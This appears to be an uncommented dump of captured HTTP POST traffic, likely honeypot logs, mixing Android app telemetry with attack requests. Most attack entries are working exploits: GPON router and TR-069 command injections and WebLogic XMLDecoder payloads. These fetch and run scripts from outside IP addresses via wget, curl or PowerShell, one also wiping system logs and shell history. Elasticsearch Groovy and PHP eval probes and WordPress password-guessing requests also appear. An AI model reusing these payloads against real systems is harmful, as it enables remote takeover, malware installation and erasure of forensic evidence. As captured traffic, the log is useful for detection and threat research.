Content-Length: 29
Cache-Control: no-cache

log=admin&pwd=jamesatchue9999

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

FvZYyd3BNSM7tiCwYGZLMe991qFXOyGy6THE1Alz3qWCP4MBigQeLiHvZrnH5c3l+XN1myNE2FQfNo7ZO7qo3GrNS9M/smT7i+vcSetM8fMlcACH7tYTGTpzWD7ycclp4oZC1LvJO6OCJF53y60pA6xuM9HYKuHdbKJTM17ViDzIta/IuxQ53BnMC8wCEYNQ0sx4VWvRqVLOqEWVnP/H4334+Qt791NkX97RYjYFBezvQeT0bJMAX/yLNtMT+aVCKKUqS9V3lSch8SGKeQjiyJgS1xWtznPwwE73cqXF2ERBN64CzPrvcG97ZVkl0LXWBqK5MyCeydN3NJkYja5YYKtgfO3o+crWbjtG55ri9eRVvt06CQQ+doqdVRmx2x+1LYY4QEGw8Sph1eQmIkWbmWsrp6geYGVEWhF+nGlQ1D9XKX0=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache

CF+zn3wSWS0hIgBgL3aCHasy6JOPeXN80isy15qE+tUUeK5WQdG0OG1X6aAU2xRnGhRVmasoXeisO6vlurMD+dxr5QEXB/FawtPjNVQcea5ewdC9MbvziO5Pcpd3B/tHlM0yIcuNwSJruI/ecvMAQu9hEfPexMYFgdQz9ifO4Xd+NhWoTZEyi7Jx5J0CerjTu8XQ58crYljRMKoe2rT1UL9jcGx4TPvsiyG2xKU1yPOaYCagz1uwOd99R3FL2QTJb4nqpcOO0/VEEKLsHzRPRdTW/pYgmd8x71HLbkJfM2/wAmJlrfpSU0pIXhD2aTDGj/ZZnDXzyJT6gK5nite8EliMI6y3HHQo8jI2Tg==

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=!@#123

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 576
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8" class="java.beans.XMLDecoder">
    <void id="url" class="java.net.URL">
      <string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F45.62.241.10%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
    </void>
    <void idref="url">
      <void id="stream" method = "openStream" />
    </void>
  </java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /script HTTP/1.1
Referer: http://x.x.x.x:8080/script
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x:8080
Content-Length: 0
Cache-Control: no-cache



POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ΩV7Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¶5%Y›∆√«∆fl

POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 12

key=CXIV95CX

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Nà§Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îê˜Y›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
a‰ÃÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
GˇuÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î·/Y›∆√«∆fl

POST http://p-behacdn.ksmobile.net/du HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: p-behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126

~?/3®
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcék∆¶iRĨc^9;∞êΩúqk`¶¥M<kZ&=:OdøúèïCiC*8kZ&=0OeBhGAhB*8kZ&=0OoAipaºóº’9jxË WKoBcp`B

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 26



POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST http://ucus.ucweb.com/usquery.php HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.4; id; MI_4LTE) U2/1.0.0 UCBrowser/10.9.0.946 U2/1.0.0 Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 434
Host: ucus.ucweb.com
Connection: Keep-Alive



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 809
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1037
Content-Type: multipart/form-data; boundary=4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

552312
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

2a443fb869f04039f51140ec7ccb7427
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--4rpIVE4MCqirbR1SrcUAen1dFshrzK5mv--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://ucus.ucweb.com/usquery.php HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.4; id; MI_4LTE) U2/1.0.0 UCBrowser/10.9.0.946 U2/1.0.0 Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 434
Host: ucus.ucweb.com
Connection: Keep-Alive



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive



POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Q˜ì«Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î@#Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=andrew

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=149333774597&a=PSCMN&i=3168963859&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /GponForm/diag_Form?script/ HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Hello, World
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 126

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(wget+http://46.243.189.101/w+-O+->+/tmp/w;sh+/tmp/w+gpon)&ipv=0


POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

f3
ÛŸî	
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_TT>WV[Z`~`JLrWy(FV"K
O8&

ue
GrWYVOezYNHmxbT_THi~EZ[^`}
|L[Zd|
Z`{LfYhy@YU6{4T]TLdWAPu+SeGS
Ho+\Z	`qQe@^VPNm-G	XckUo-
0



POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

